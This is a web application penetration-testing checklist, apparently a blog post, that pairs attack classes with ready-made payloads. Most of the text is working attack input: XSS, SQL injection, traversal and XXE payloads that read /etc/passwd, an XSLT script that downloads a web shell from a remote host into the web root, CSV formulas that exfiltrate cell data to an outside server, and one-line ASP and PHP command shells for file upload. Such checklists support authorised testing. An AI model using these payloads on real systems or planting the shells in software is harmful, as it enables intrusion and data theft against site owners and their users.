It’s always handy to have a good checklist when it comes to web app pen-testing. It’s even better to have some examples for each case 🙂
We’ll start with more “general” cases and then dig deeper into some obscure or language dependent attacks.
Glossary
XSS (Cross-site scripting)
CSS(Cascading Style Sheet) injection
Format string attack
Directory traversal
SQL injection
SSJSI
XXE (Xml eXternal Entity)
XXE C# remote code execution
Deserialization
Expression Language Injection
Insecure direct object access
Open redirect
HTTP content splitting
CSRF (Cross-site request forgery)
CORS (Cross-origin resource sharing)
Check if tokens are removed at logout
Change HTTP Referer
Truncate file names
CSV injection
Code execution
File upload
Examples
XSS (Cross-site scripting)
<svg onload=alert(1)>
<svg/onload=alert(1)>
<img src=x123 onerror=confirm(1)>
onmousemove="prompt(1);"
CSS (Cascading Style Sheet) injection
When a CSS file is imported into the page, check for the absence of a leading “/” character.
Here is an example:
<link href="styles.css" ...
Format string attack
%d%d%d……%d
%n%n%n……%n
%lf%lf%lf……%lf
%s%s%s……%s
%x%x%x……%x
Directory traversal
../../ [...] /etc/ passwd
../../ [...] /windows/ system.ini
SQL injection
' or "1"='1
" or '1'="1
" OR SLEEP(5000) --
' OR SLEEP(5000) --
" OR WAITFOR DELAY '00:00:05' --
' OR WAITFOR DELAY '00:00:05' --
...
SSJS injection
res.end('malwrforensics')
res.end(require('fs').readFileSync('/etc/ passwd'))
XXE (Xml eXternal Entity)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc / passwd" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds><user>&xxe;</user>
<pass>mypass</pass></creds>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://malwrforensics.com/scripts/hex_to_bin.txt" >]>
<foo>&xxe;</foo>
XXE C# remote code execution
<?xml version='1.0'?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://test.com/testnamespace"> <msxsl:script language="C#" implements-prefix="user"> <![CDATA[ public string xml() { System.Net.WebClient webClient = new System.Net.WebClient(); webClient.DownloadFile("https://x.x.x.x/shell.aspx", @"c:\inetpub\wwwroot\shell.aspx"); return "It works!"; } ]]> </msxsl:script> <xsl:template match="/"> <xsl:value-of select="user:xml()"/> </xsl:template> </xsl:stylesheet> If you don't have a webserver at your disposal, you can just check if it's working wiht a code like this: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://example.com/ns"> <msxsl:script language="C#" implements-prefix="user"> <![CDATA[ public string Code() { return "malwrforensics_token"; } ]]> </msxsl:script> <xsl:template match="/"> <xsl:value-of select="user:Code()"/> </xsl:template> </xsl:stylesheet> (more details here)
More details here.
Deserialization
Java
This is a great resource (and cheat sheet).
.NET:
You can find here a basic C# example of a deserialization attack.
Usually the payloads will be base64 encoded.
AAEAAAD/////...
Expression Language Injection
T(java.lang.Runtime).getRuntime().exec(“calc.exe”)
More details here.
Insecure direct object access
If an object is referenced by an ID, check if you can access other objects that aren’t exposed (objects you aren’t supposed to have access to).
Example: https://web.site/downloadfile?id=12345
Check other objects with different IDs (..,12344, 12346,..)
Open redirect
This usually happens when one of the parameters in a form points to an URL.
Example: https://web.site/doCmd?id=1&url=http://web.site/page
You can change the url to point to another (phishing/malicious) website.
Can be used to bypass some content filtering systems, especially if used in conjunction with an URL shortening service.
HTTP content splitting
Inject CR/LF (\r\n) in the HTTP headers (for example if you control a cookie value).
More details here.
CSRF (Cross-site request forgery)
Check for the presence of tokens with random values in forms. Especially forms that will change a password, edit an address/order/.., etc.
CORS (Cross-origin resource sharing)
Set the “Origin” in the HTTP header to a website you control. For example, it can be useful to steal CSRF tokens.
curl -H "http://malwrforensics.com" http://<yourwebsite>
Check if you receive
"Access-Control-Allow-Origin: http://malwrforensics.com" or
"Access-Control-Allow-Origin: *"
More details here and a great explanation here.
Check if tokens are removed at logout
Check if the tokens and cookies are still valid if you logoff. Use a proxy to get the cookies/parameters and then iterate through them and check if they are still valid.
Change HTTP Referer
Use a proxy (Burp/ZAP/etc) to intercept and change the Referer field. Look for errors.
Truncate file names
Add %00 or %0D%0A when doing GET/POST requests for files.
CSV injection
Add something like one of the following in the fields in the csv file.
"=1+1+cmd|' /C calc'!A0"
"=IMPORTXML("http://web.server?p="", "//a")"
"=IMPORTXML("http://web.server?p=", "//a/@href")"
=HYPERLINK("http://web.server?leak="&A1&A2,
"Error: please click here")
This will show an error and when the user clicks on it,
the contents of A1 and A2 fields will be exfiltrated.
Code execution
; cat /etc/ passwd
& dir c:
File upload
If the page you’re testing allows users to upload files, you may want to test some of the following:
- html page with javascript
<html><body> < script > alert ( 'test' ); < / script>
- html page with ASP.NET
<% label1.Text = "test"; %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head runat="server"> <title>Test Page</title> </head> <body> <form id="form1" runat="server"> <div> <asp:Label runat="server" id="label1"></asp:Label> </div> </form> </body> </html> or <% Eval ( Request.QueryString ( "cmd" ) ) ; %>
- office files with macros
Create a new office file, open the VBA editor and go to a function like Document_Open() and add the following code: MsgBox("test") or Shell ("calc.exe", vbNormalFocus)
- xml file
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:/// etc / passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:/// c:/ windows / system.ini" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://malwrforensics.com/en/" >]><foo>&xxe;</foo>
- images with appended php code
< ? php echo ( "test" ); ? > or < ? php passthru ( base64_decode ( $_GET ['cmd'] ) ) ;? >